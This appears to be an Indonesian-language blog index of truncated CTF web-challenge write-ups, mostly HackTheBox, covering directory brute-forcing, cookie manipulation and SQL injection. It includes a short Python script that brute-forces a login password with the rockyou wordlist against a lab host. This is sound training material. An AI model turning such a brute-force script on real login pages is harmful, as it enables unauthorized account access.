Diberikan website yang kita tidak bisa dimasuki, di check dalam burp juga tidak memiliki apapun yang special. With a bit of manual bruteforce saya menemukan page index.php dengan menggunakan method POST menghasilkan output yang berbeda. Seems like we have some input stuff, coba menginput apapun tidak memberikan output apapun, hanya “only lowercase characters” bila diberikan […]
Author: EternalBeats
[HackTheBox – CTF] – I know mag1k
Diberikan sebuah web berisikan login dan register page. Mencoba beberapa serangan ke login page tidak membuahkan hasil maka saya mulai membuat account dengan register terlebih dahulu. Setelah masuk ke dalam account yang dibuat tidak terlihat seperti ada apapun yang menarik, jadi saya berfikir bagaimana untuk mengganti user yang aktif. Teringat bahwa biasanya kita bisa memanipulasi […]
[HackTheBox – CTF] – Freelancer
Pada challenge yang ini kita diberikan sebuah website yang terlihat tidak ada apa apa yang menarik. Tetapi scroll sedikit kebawah terlihat ada semacam “contact us” tetapi sepertinya yang ini tidak membuahkan hasil. Pada saat ini saya mencoba untuk memakai dirbuster untuk melihat directory apa yang ada dan mungkin melihat kenapa contact me ini tidak bisa […]
[HackTheBox – CTF] – Fuzzy
Pada soal kali ini kita diberikan website yang terlihat tidak ada apa-apa. sema fiture terlihat useless, search function yang tidak memberikan hasil apapun dan link redirect yang tidak kemana-mana. Karena semua linknya menuju /# saya berfikir bahwa terdapat file yang tersembunyi, so I pull out Dirbuster untuk mencari apapun itu yang ada didalam website ini. […]
[HackTheBox – CTF] – Emdee five for life
Pada soal kali ini kita diberikan website dengan 1 text box dan kita diberikan intruksi bahwa kita diminta untuk menencrypt suatu string menjadi MD5. So let’s do just that. Saat kita memasukan MD5 nya, kita dapat response “Too slow!”. Let’s try some scripting.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
import requests import hashlib import re url = "http://docker.hackthebox.eu:40113" r = requests.session() response = r.get(url).text word = re.findall(r"(?:<h3 align='center'>)(.+)(?:</h3)", response)[0] encrypted = hashlib.md5(word.encode()).hexdigest() response = r.post(url, data={"hash" : encrypted}).text print re.findall(r"HTB\{.+\}",response)[0] |
Dengan ini kita dapat mengambil string dalam website tersebut dan langsung […]
[HackTheBox – CTF] – Lernaean
Di challenge kali ini kita diberikan website dengan 1 textbox, bila kita masukan hal random diberikan response “Invalid password!”. Dan bila kita mencoba basic SQL injection tidak memberikan hal baru apapun. Karena dibilang “do not try to guess my password”, so I thought let’s try some bruteforce.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
import requests url = "http://docker.hackthebox.eu:39511/" file = open("rockyou.txt", "r") for line in file: line = line.split('\n')[0] params = {"_ga" : "GA1.2.987465826.1566441808", "_gid" : "GA1.2.1734517775.1566965361", "password" : line} response = requests.post(url, data=params) print line if "Invalid password!" not in response.text: print "passoword found! = " + line break |
Script ini sederhana hanya mencoba semua line […]
[Websec] – Level 07
Soal yang ini kita diberitahu langsung bahwa dia memprevent SQL Injection, so… what do we do? we use SQL Injection on them. Tapi mari kita coba-coba dulu, pertama kita diberikan text box untuk memasukan inputan dan kita sudah diberikan angka 1. Bila kita submit itu 1 makanya hasil yang keluar adalah… Dan bila kita submit […]
[TJCTF2019] – Moar Horse 2
WriteUp reference : https://github.com/Hong5489/TJCTF-2019/tree/master/moar Pada soal yang ini kita diberikan sebuah website yang memiliki 2 tombol (“Backward”) dan (“Forward”). Bila kita click backward berkali-kali atau forward berkali-kali kita berakhir pada link yang sama yaitu /4b043a01-a4b7-4141-8a99-fc94fe7e3778.html, tetapi bila kita click backward beberapa kali dan kemudian click forward beberapa kali kita mendapatkan link yang berbeda-beda. Kita sepertinya […]